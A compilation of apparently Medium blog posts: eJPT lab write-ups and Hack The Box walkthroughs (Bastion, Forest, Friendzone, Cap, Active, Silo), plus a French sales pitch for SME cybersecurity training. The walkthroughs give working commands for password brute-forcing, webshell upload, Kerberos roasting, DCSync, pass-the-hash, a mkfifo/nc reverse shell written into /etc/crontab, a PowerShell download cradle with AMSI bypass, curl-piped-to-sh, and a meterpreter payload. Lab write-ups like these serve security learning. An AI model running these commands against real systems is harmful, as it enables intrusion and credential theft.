TASK 1 User ‘bob’ might not have chosen a strong password. Try common passwords. (target1.ine.local)

Firstly, let scan our target with nmap

nmap -sV target1.ine.local

There is a website on port 80, let open it

We need credentials to log in, we can brute force with hydra

And we get a valid password

Once connected, we can see it is a microsoft II server, usually work with webdav.

Let navigate to the webdav folder

We catch our flag.

TASK 2 Valuable files are often on the C: drive. Explore it thoroughly. (target1.ine.local)

Now, we can interact with webdav and adding a webshell.
This can be done with cadaver utility.

What we see, the folders in the server; cadaver give us possibility to add file in the server with command put.

Once do it, we can navigate to /webshell.asp

And we can interact with system and hit commands.
For example, the output of command dir c:\ to list content of C: directory

And we can display our flag, with command type c:\flag2.txt

TASK 3 SMB shares might contain hidden files. Check the available shares. (target2.ine.local)

Let list available shares on target, connect as anonymous(without password)

smbclient -L \\TARGET_IP --no-pass

Access denied, so we will brute force with smb_login module of metasploit

And we have administrator password

We explore folder C$ to catch our flag

TASK 4 The Desktop directory might have what you’re looking for. Enumerate its contents. (target2.ine.local)

In the directory Desktop, we catch our flag.

Thanks for your reading :)

If you have any questions drop it in comments.

TASK 1 Explore hidden directories for version control artifacts that might reveal valuable information.

First of all, let start by a scan with nmap, this will help to have comprehensive knowledge of our target.

nmap -sV target.ine.local

Obviously, the task 1 concern the web application which run on port 80. Lets have more information about it by execute the following nmap command

nmap -sC -p 8O target.ine.local

As you can see in the previous output, is a web app which synchronize with a remote github directory. A sensitive folder when we generally talk about githbub is the .git which need to be hidden

In the case of you target, it is not hide and ouura we found our first flag.

TASK 2 | The data storage has some loose security measures. Can you find the flag hidden within it?

Based on the nmap output scan, we can conclude that there is a phpmyadmin page. Let navigate to it

We can access to the mysql database, and there is table named secret_info

TASK 3 A PHP file that displays server information might be worth examining. What could be hidden in plain sight?

The description of a file related to the phpinfo page. So let net navigate to the phpinfo.php and we got our flag

TASK 4 Sensitive directories might hold critical information. Search through carefully for hidden gems.

Lets go to the robots.txt and see which folders is disallowed to robots(crawler like google) to index it

There is an intersting folder named passwords; let explore it

And we found our last flag.

Hope this article help you in the pathway of learning pentesting, if it case : like and share. For any other questions drop a comments or reach me on my mail.

Assessment is a crucial step in penetration testing. It is impossible to identify weaknesses in a system without understanding how it functions, both internally and in interaction with other systems. Enumeration, a key part of the assessment methodology, involves interacting with the services running on a target to collect valuable information such as usernames, passwords, and shared resources. I’ve decided to conceal the flag to encourage readers to focus on the methodology rather than the solution (you can thank me later).

TASK 1 There is a samba share that allows anonymous access. Wonder what’s in there!

Samba is the Linux equivalent of the SMB service. SMB, which stands for Server Message Block, is a protocol used for sharing files over a network. In the context of penetration testing (or networking in general), allowing anonymous access means that users can interact with a service without requiring a password. To interact with Samba or SMB on a Linux system, you can use the smbclient utility. The command to list available shares with anonymous access is straightforward and efficient.

In the context of pentesting(or networking generally) anonymous acces allowed means be able to interact with a service without need a password.

To interact with samba or smb in a linux system you can use the smbclient utility, the command to list available shares in anonymous acces is :

smbclient -L //TARGET_IP --no-pass

As you can see in the following screenshot, with have two folders accessible

To interact with a folder, use the following command

smbclient -L //TARGET_IP/folder --no-pass

As you can see in the follow screenshot, print$ is not accessible without password and IPC$ is empty

It is not what we excepted(no folder to retreive flag), so how to do?
Remember this instruction in the lab guidelines

In this folder we have a file named shares , look like a wordlist to use to enumerate available share

How can you do that? You might search for a solution, but let me save you some time: there isn’t a pre-installed tool in the attack box to assist with this. Instead, I use a custom bash script along with a wordlist to identify available shares on a Samba server. You can create your own script, or leave a comment if you’d like me to share mine.

As shown in the screenshot, there is a folder available named “pubfiles.”

As you can see in the following screenshot, there is a folder availabe named pubfiles

Let’s connect to it via

smbclient -L //TARGET_IP/pubfiles --no-pass

Once connect to folder, we can use ls to list files

And youpi!! , we have our flag. we can download it we the get command

TASK 2 One of the samba users have a bad password. Their private share with the same name as their username is at risk!

To enumerate users, we can use enum4linux

enum4linux TARGET_IP

Without specify any username or password, it will connect as anonymous, and we have 3 users

Let save usernames in a file call smb_users.txt

Now, we can use the module of metasploit and set options. For password wordlists you can use the one at /root/Desktop/wordlists/unix_passwords.txt

After exploit, we have the password of josh

Let use these new credentials to connect to the folder josh

smblcient //TAGET_IP/josh -U josh

Oh oh oh! There is our flag

TASK 3 Follow the hint given in the previous flag to uncover this one.

The previous flag said, we have an FTP service runnig on target, let scan with nmap

nmap -sV -p- target.ine.local

With the previous command with scan all the ports form 1 to 65535(-p-) to know running services and their version(-sV)

As you can see in the previous output, we have an FTP service running on port 5554, try to connect and we have another hint

Create a file ftp_users with the username specified in banner and we can use hydra( a powerfool password cracking tool)

hydra -L ftp_users.txt -P /root/Desktop/wordlists/unix_passwords.txt ftp://TARGET_IP -s 5554

The flag -s is to specified to port where ftp running on, otherwise hydra will test the default port(21)

ftp alice@target.ine.local -P 5554

Don’t forget to set the -P to set the custom port

Let connect to ftp, use these credentials; with the following command

TASK 4 This is a warning meant to deter unauthorized users from logging in.

Did you remember the output of the nmap scan of target ?
There is ssh running on port 22. Lets connect to

ssh target.ine.local

And, we have our last flag.

Thanks for your reading, hope the article help you in your pathway to get ejpt, if it is case put a like, share and drop a comments.

For any other need, yo can reach me via my mail or LinkedIn.

EjptV2| Assessment methodology : Enumeration CTF1 was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.

À la fin de cet article, vous pourrez réserver une consultation gratuite durant lequel nous discuterons de l’évaluation de la posture de sécurité de votre entreprise.

« Nous n’avons même pas d’ordinateur ici, à quoi vont servir vos offres de cybersécurité ? »

Cette phrase, répétée maintes fois par des chefs d’entreprise, m’a souvent laissé sans voix et résume parfaitement l’état de la cybersécurité dans les TPE/PME au Cameroun.

En général, ces entreprises fonctionnent avec une infrastructure informatique légère— généralement une ou deux machines pour la secrétaire et le directeur général. Dans ce contexte, l’exécutif pense, à tort, qu’il n’est pas exposé aux cybermenaces, car il n’y a pas d’ouverture significative sur Internet.

Mais est-ce vraiment le cas ?

Même si vous ne possédez pas une dizaine d’ordinateurs, vous avez une mine d’informations critiques à protéger : les contacts de vos clients, vos échanges confidentiels, la liste de vos fournisseurs, vos brevets, etc.

La majorité de ces données sensibles est stockée sur les smartphones des collaborateurs, sur des clés USB (souvent égarées) utilisées pour le transfert de fichiers critiques, ou encore sur leurs ordinateurs personnels. Vous voyez le pot-aux-roses ? Même sans une infrastructure informatique sophistiquée, vos collaborateurs exposent vos informations.

Des pertes financières considérables que vous pouvez éviter

Vous ne voulez sûrement pas que votre argent fasse partie des 12,2 milliards FCFA de pertes dues aux cyberattaques. Pourtant, selon l’Agence nationale des TIC (Antic), c’est exactement ce montant qui a été perdu par les entreprises camerounaises en 2021.

Les chiffres récents en témoignent :

• 19,41 millions de cybermenaces ont été enregistrées sur les 12 derniers mois de 2024, en baisse de 1,5% par rapport aux 19,76 millions d’attaques de l’année précédente.
• Les menaces locales (via supports physiques) ont diminué de 15%, passant de 14,05 millions en 2023 à 11,99 millions en 2024.
• À l’inverse, les menaces en ligne ont augmenté de 29,9%, passant de 5,71 millions en 2023 à 7,42 millions en 2024.
• Les attaques exploitant des failles de sécurité ont bondi de 91%, passant de 174 472 en 2023 à 333 930 en 2024.

Ces données montrent clairement que, même sans un système informatique avancé, les TPE/PME camerounaises sont gravement exposées. Les appareils personnels de vos collaborateurs deviennent alors des vecteurs potentiels de vol ou de compromission de vos informations sensibles.

Un scénario que vous pourriez bientôt vivre

Imaginez si le smartphone ou l’ordinateur portable de votre comptable est volé : le voleur pourrait accéder à toutes les fiches de paie de vos employés, à la liste de vos fournisseurs, voire aux tarifs d’achat de vos matériels. Ces informations pourraient ensuite être exploitées par vos concurrents pour débaucher vos talents ou détourner vos partenariats.

La solution est plus simple que vous ne le pensez

En résumé, même si vous pensez ne pas être concerné par une infrastructure informatique sophistiquée, sachez que vos collaborateurs et leurs appareils constituent les principaux canaux par lesquels circulent vos informations critiques — et donc les portes d’entrée potentielles pour les cyberattaques.

Pour vous prémunir contre ces risques, il est essentiel de former vos collaborateurs aux bonnes pratiques de sécurité.

Prêt à protéger vos données et à renforcer la sécurité de votre entreprise ?

Ne laissez pas vos collaborateurs devenir le maillon faible de votre sécurité. Contactez-nous dès aujourd’hui pour une évaluation gratuite de votre niveau de cybersécurité et découvrez comment nos formations sur mesure peuvent transformer vos pratiques et protéger vos informations critiques.

Cliquez ici pour réserver votre consultation exclusive et faites le premier pas vers une TPE/PME plus sécurisée !

Reconnaissance

The first step is to scan target machine to have an overview on running services and open ports

nmap -p- -T5 TARGET_IP -sC -sV

As seen in previous output, several ports are open with services running on, but the most interesting is the 139 port which run smb service. Samba is used to share files in a network and sometimes administrators enable anonymous login which is a configuration to allow user to connect without password, let’s check if it is the case on our target.

ENUMERATION

The first thing to do, is list shared folders trough smbclient. Just hit <ENTER> when password will ask and you will connect as anonymous

smbclient -L TARGET_IP

Output show a Virtual Disk named Backups, we can open a smb shell and explore it with the following command

smbclient //TARGET_IP/Backups

The Backups folder contain a WindowsImagesBackup which I explore and find inside two particular VHD files

Mount VHD Files

Now we need to mount these files in our local machine to see their contents.
First, install these utilities

sudo apt-get install libguestfs-tools
sudo apt-get install cifs-utils

Mount the remote share to our local machine, inside the /mnt/remote folder we create

mount -t cifs //TARGET_IP/Backups /mnt/remote -o rw

And we can find out the vhd files now in our local machine inside the folder : /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup 2019–02–22 124351

Create another folder /mnt/vhd to mount these files, with the following command

guestmount --add /mnt/remote/path/to/vhdfile.vhd --inspector --ro /mnt/vhd -v

As seen in previous output, one of vhd file(the second) is a whole copy of the disk of users. Take a look inside the location Windows\system32\config

Inside, we have SAM and SYSTEM registry which can be dumped to have encrypted password with sampdump2 tool

samdump2 SYSTEM SAM

INITIAL ACCESS

By cracking the password of L4mpje user, we can have initial access. Let’s do this with crackstation. Note that the hast is the fourth field

Remember that ssh port is open, we can connect using credentials L4mpje/bureaulampje

ssh L4mpje@TARGET_IP

Once inside, we can easily retreive the flag.

PRIVILEGE ESCALATION

Once we have an initial access, try now to compromise an administrator account.

The vector of compromising here is use of software which have a weak password storing. Take a look of softwares installed, in the Program Files (x86).

There is the folder mRemoteNG, do a little research about this software on Google, show that the password storage is insecure. Inside the AppData folder of user L4mpje, we can see the confCons.xml files contains encrypted password of Administrator user.

The problem is that, this password can be easily decrypted with script like this https://github.com/haseebT/mRemoteNG-Decrypt.

Now we have password, let’s connect trough ssh

ssh Administrator@TARGET_IP

And capture the Flag

Hope you enjoy reading me :)

If it was case, like and share.

BASTION HTB WALKTHROUGH was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.

RECONNAISSANCE

The first step is to scan machine to have better understanding of our target

nmap -sC -sV TARGET_IP

There are a lot of open ports, majority related to active directory which LDAP protocol running on port 3268 with domain name : htb.local.

LDAP ENUMERATION

I started by try anonymous login with ftp and smb protocols but doesn’t work, after this I learned that it is possible to do anonymous login to LDAP. This tool : windapsearch is useful to enumerate users, groups, admins. After install it, I use the following commands to retrieve a list of users

./windapsearch.py -d htb.local --dc-ip TARGET_IP -U
# -U is flag to specify action is list users

Given that anonymous login is possible, we can do this without credentials

Once we have usernames, the next step is to find which is vulnerable. Remember that the domain use Kerberos as authentication protocol and one of misconfiguration widely found is pre-authentication disabled, known as AS-REP-ROASTING. We can achieve this with GetNPUsers script of impacket.

impacket-GetNPUsers -dc-ip TARGET_IP-no-pass -usersfile users.txt htb.local/

User svc-alfresco is vulnerable, and we can get the hash of it password.

hashcat -m 18200 hahs.txt rockyou.txt

We can crack hash by using hashcat.

GAINING ACCESS

Now, we have a username and a password, we can use it to connect with evil-wirm

evil-winrm -u svc-alfresco -p s3rvice -i@TARGET_IP

We can retrieve flag

PRIVILEGE ESCALATION

Now we have are logged as a regular user, let's try to become an admin.
To achieve this, we will use bloodhound-python, it will help us to collection all information (group, users, permission) about the active directory domain and the result can be display on bloodhound whose help us to have a graphical view.

Firstly, install bloodhound-python

pip install bloodhound

Then, hit the following command

bloodhound-python -u svc-alfresco -p s3rvice -d htb.local -ns TARGET_IP

This will collect information about AD domains, and generate some JSON files

Import these files on bloodhound. After done, search for svc-alfresco and mark user as owned.

By double-clicking on the node, you can access the Node Info tab. In this tab, the “GROUP MEMBERSHIP” section displays the groups in which svc-alfresco is enrolled. Simply click on the number 9 to view these groups.

We note that, svc-alfresco is member of Account operators and can add users.

Go to analysis tab, and choose “shortest paths to high value targets”, with this query, we see that the group “EXCHANGE WINDOWS PERMISSIONS” have the writeDACL, means user in this group can add ACL to any object in the AD

Now from our evil-winrm shell, let's create a new user; and add it to the “Exchange windows Permissions” and “Remote Management Users” groups

To be able to use command to modify acl rights of our new user, we to upgrade the simple evil-winrm shell to a powerview shell.

• First download it in your attack box and launch a simple http server

• Use the Bypass-4MSI command in the evil-winrm shell to evade any defender before import script

• Import the script

iex(new-object net.webclient).downloadstring('http://TARGET_IP:8000/PowerView.ps1')

Now, we can use the Add-ObjectACL command

$pass = convertto-securestring 'R0bot321!' -asplain -force
$cred = new-object system.management.automation.pscredential('htb\mrRobot',$pass)
Add-ObjectACL -PrincipalIdentity mrRobot -Credential $cred -Rights DCSync

What done is call DCSync attack which allows an attacker to impersonate a domain controller and request password information for all Active Directory users, including administrator accounts and the KRBTGT account (used for Kerberos authentication). The attacker utilizes Active Directory’s native replication features to extract this information.

Once done, use the secretsdump script of impacket with credentials of our mrRobot user

impacket-secretsdump htb/mrRobot@TARGET_IP

As output, we have password hashes of all AD users

Use it to connect trough psexec

impacket-psexec administrator@TARGET_IP -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Now let’s capture the admin flag

Hope you enjoyed reading :)

Follow me for more.

FOREST HTB WALKTHROUGH | STEP-BY-STEP was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.

RECONNAISSANCE

First, scan the target using nmap

nmap -sC -sV TARGET_IP

Some ports are open and have service running on : 21(FTP), 22(SSH), 80(HTTP), 445(samba)

ENUMERATION

Now we knew running services, we will try to get more information about the target by using the fact that some ports are open.

Samba share files

Samba is a protocol use by Linux system to share files in a network. Sometimes poor configuration allow a user to connect as anonymous which mean without any password. I use the following command to see shares folders

smbclient -L //TARGET_IP

NOTE : to connect anonymous, don’t hit any password it will be asked or add the flag -N to the previous command

Once we have this list, let's look at any shared folder for which anonymous user have read right. By using the following command, you can open a folder as anonymous and have interactive SMB shell

smbclient -N //TARGET_IP/folder

Try command for each shared folder, the folders with which anonymous user have read right is Development, and general

As you seen in the figure, there is an interesting file inside the folder general

Get the file and opened it

The file contains admin password, but the combination of these credentials not work to connect the machine with ssh. So keep the retrieve information in mind, and let's find where these credentials can work

Website enumeration

Remember port 80 is open, running the HTTP service mean that at the address http://TARGET_IP there is a website.

But using the IP address for enumerating site web can create a lot of confusion with some tools. Another notable thing to remind from reconnaissance phase is that the port 53 is open and running DNS service, which mean the website can be accessed by using not only IP but domain name. But our Attack Box seem to not be aware about it, we update the /etc/hosts file, then hit friendzone.red in our browser will redirect us to TARGET_IP site

Navigate to http://friendzone.red

The port 443 running too, mean website supports HTTPS. Navigate to https://friendzone.red

The site seem to be most update, so we will target it. First enumerate subdomains, using di.

dig axfr friendzone.red @TARGET_IP

Add found subdomains to /etc/hosts

echo "10.129.43.69 administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red"

Let’s visit https://administrator1.friendzone.red there is a login page.

Try the credentials we previously found : admin/WORKWORKHhallelujah@#

We can know visited dashboard page

Something interesting with this page is that, you can open another php page by provide his name as url parameters.

The result with dirbuster show another php page which is timestamp.php

With the following url : https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp, an image and the timestamp web page is opened

There is a huge vulnerability that mean a malicious php file can be executed, but how can we exploit it ? Remember, we have a read and write access to the samba share folder development

nmap --script smb-enum-shares.nse 10.129.43.69

GAIN ACCESS

The workflow to gain access is simple : upload a reverse shell in samba shared Development folder and open it via the dashboard page.

First connect trough smbclient

smbclient "//10.129.43.69/Development" -N

Now download a php reverse shell, there is a good one here : https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php, and modify IP by your attack box IP and set chosen port

Upload the file in shared folder

Open a listener with ncat

nc -e /bin/sh -lvnp 4444 

Set the page name parameter with the full path to shell, URL will look like https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell

Note that shell is the name i gave to my file

We are in, connected as www-data user

We can retrieve its flag at /home/friend

PRIVILEGE ESCALATION

Once have regular access, we will try to be root user. But before, let’s upgrade our shell to be more interactive

python -c 'import pty; pty.spawn("/bin/bash")'

First, I do a lateral movement to connect as a regular user. I found a password in the file mysql.conf

And try to connect using it, and it works (password reuse is a common bad security habit)

Connected as Friend user, the vector use to be root is exploit running cron jobs; which is automated script run by linux; the vulnerability to exploit is that some of these cron is ran as root.

This is awesome tools help to spy running process on Linux machine even without needed privileges : https://github.com/DominicBreuker/pspy. Put the script in share folder, and execute it

What we can see is that there is the file /opt/server_admin/reporter.py running every 1 minutes with root permission(UID=0). But we don’t have permission to write on reporter.py, but it imports a file in which we have write permission(you can use linPES to checkit)

This vulnerability is known as module hijacking, to exploit it, let's first create a new os.py file and put it in share folder

shell = '''* * * * *  root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TARGET_IP 1234 >/tmp/f \n'''
f = open('/etc/crontab', 'a')
f.write(shell)
f.close()

This will adds a one line reverse shell as cron jobs

Replace the original contain of file by the malicious one you created

Open a listener, wait for the execution of cron, you can see new line inside the /etc/crontab

We’re in, connected as root and retrieve flag

Hope you enjoy reading, if have any questions, drop in comment.

FRIENDZONE HTB WALKTHROUGH was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.

RECONNAISSANCE

The first step in hacking methodology is to have a global view of the target and what running on. This can be done by a simple nmap scan

nmap -sC -sV TARGET_IP

There are some opens port and running services : 21(tcp),22(ssh),80(http).

Start by exploring website, seems an online tool for network scanning

Look at the URL where app redirect after done a security snapshot.

The form is http://TARGET_IP/data/[id]; the id can be modified and we can be redirected to another scan. Try to acces http://TARGET_IP/data/0

Download file and open it with wireshark

While exploring the file, I note an FTP request connection with password non encrypted

Remembered SSH port is open, so i tried to connect trough ssh, hoping the password is reused

ssh nathan@TARGET_IP

It was the case and we are IN

Can now retrieve the user flag

PRIVILEGE ESCALATION

nathan user is not an admin, so we need to do a privilege escalation.

This can be done, by use linPEAS which is an automated script, will help to give way to have an admin account

Victim machine is not connected to internet, to transfer it the script, we will first download it on our own machine

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

And launch a simple http server using python

python -m  http.server

Finally download file in victim machine with following command

wget http://TARGET_IP:8000/linpeas.sh

Execute it

sh linpeas.sh

We got an interest result, the /usr/bin/python3.8 is executed by nathan user as admin

We can take profit of this, by using the following command

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash");'

And retrieve the root flag inside /root directory

You successful Pwn this machine.
Hope you enjoy your reading. If there is any question ask in comments :)

CAP WALKTHROUGH | HACK THE BOX | CAPUTRE THE FLAG | LINUX SYSTEM was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.

RECONNAISSANCE

Let scan the machine first to know, which are running services

There are a lot of open ports.
Firstly, we will focus on the SMB port, trying to list all shares folders with the following command

smbclient -L //TARGER_IP

When password is asked, don’t hit anything and just press Enter, will log in as anonymous, and see these folders

Once I have share files, I try to read each folder, and only the Replication folder can be read by anonymous login

smbclient "\\\\TARGET_IP\Replication"

Once inside, I started to explore the folder and am fall on a particular file

Which I downloaded on local machine

The file contain user and encrypted password

The password can be decrypted by using the tool gpp-decrypt

With these credentials, we can access another folders like Users and explore it.

Inside the Desktop folder we can get the user flag and download it

Privilege Escalation

With a regular user account, we can use the impacket-GetUserSPNs script to know which user account is vulnerable to Kerberoasting which is common in Active Directory environment. You can learn more about the authentication protocol Kerberos and the attack here.

Firstly, we can list users with the following command :

impacket-GetUserSPNs -dc-ip TARGET_IP 'active.htb/SVC_TGS:GPPstillStandingStrong2k18'

By adding the flag -request to the previous command, we can retrieve the NTLM hash of the password of Administrator user.

impacket-GetUserSPNs -dc-ip TARGET_IP 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -request

Once we have it, we can crack hash with haschat.

hashcat -m 13100 hash /usr/share/wordlist/rockyou.txt

The flag -m represent the algorithm use for generate hash which is Kerberos 5, etype 23, TGS-REP represent in tool by 13100

Hashcat successful crack the admin password which is Ticketmaster1968

Let’s connect as Administrator by using impacket-psexec

impacket-psexec 'active.htb/Administrator:Ticketmaster1968'@TARGET_IP

And we are in

And we capture the Flag

Hope you enjoy reading. If you have any questions, drop it in comments

ACTIVE HTB WALKTROUGH was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.

RECONNAISSANCE

The first step is to scan the machine to know which services are running and version by using nmap.

nmap -sC -sV -Pn -p-10000 TARGET_IP

As we can see in the following result, there are 6 ports open.

In port 1521, the service running an oracle database. A little research about the used version show that, there are commons vulnerabilities discover about it.

VULNREABILITY ON ORACLE DATABASE

The first thing to do is to have a valid SID which help us to connect to the oracle database. For guest a valid SID, we will use metasploit.

The metasploit module to use is auxiliary/scanner/oracle/sid_brute, which done a brute force to find valid SID. Set different options and run module

With the valid SID, we can get password from user. Let's do that by use this fabulous tool for oracle database security testing : https://www.kali.org/tools/odat/. The following scan will test the database and find username and password

sudo odat passwordguesser -s TARGET_IP -d SID

The tool found the user scott and it password tiger.

With these credentials, we can use odat tool to upload a payload on target machine and execute.

Create payload with this command

 msfvenom -p
windows/x64/meterpreter/reverse_tcp lhost=<LAB IP> lport=<PORT> -f exe > payload.exe

Now we can upload the payload on the target machine using odat

odat utlfile -s TARGET_IP -U scott -P tiger -d XE --sysdba --putFile c: shell.exe path_to_payload

As you seen payload is successful download, before execute it, opened a listener on attacker machine by using exploit/multi/handler of metasploit

set payload payload/windows/x64/meterpreter/reverse_tcp
set LHOST ATTACK_BOX_IP

Now execute the file trough odat

odat externaltable -s TARGET_IP -U scott -P tiger -d XE --sysdba --exec c:/ writeup.exe

whe are In

Another interesting thing is that, we are connected as administrator, so just open a shell and found flags.

The user’s flag inside the folder C:\Users\Phineas\Desktop

The admin’s flag inside the folder C:\Users\Administrator\Desktop

Thanks for reading. Hope you enjoy it, if you have any questions, ask in comments.

SILO HTB WALKTHROUGH was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.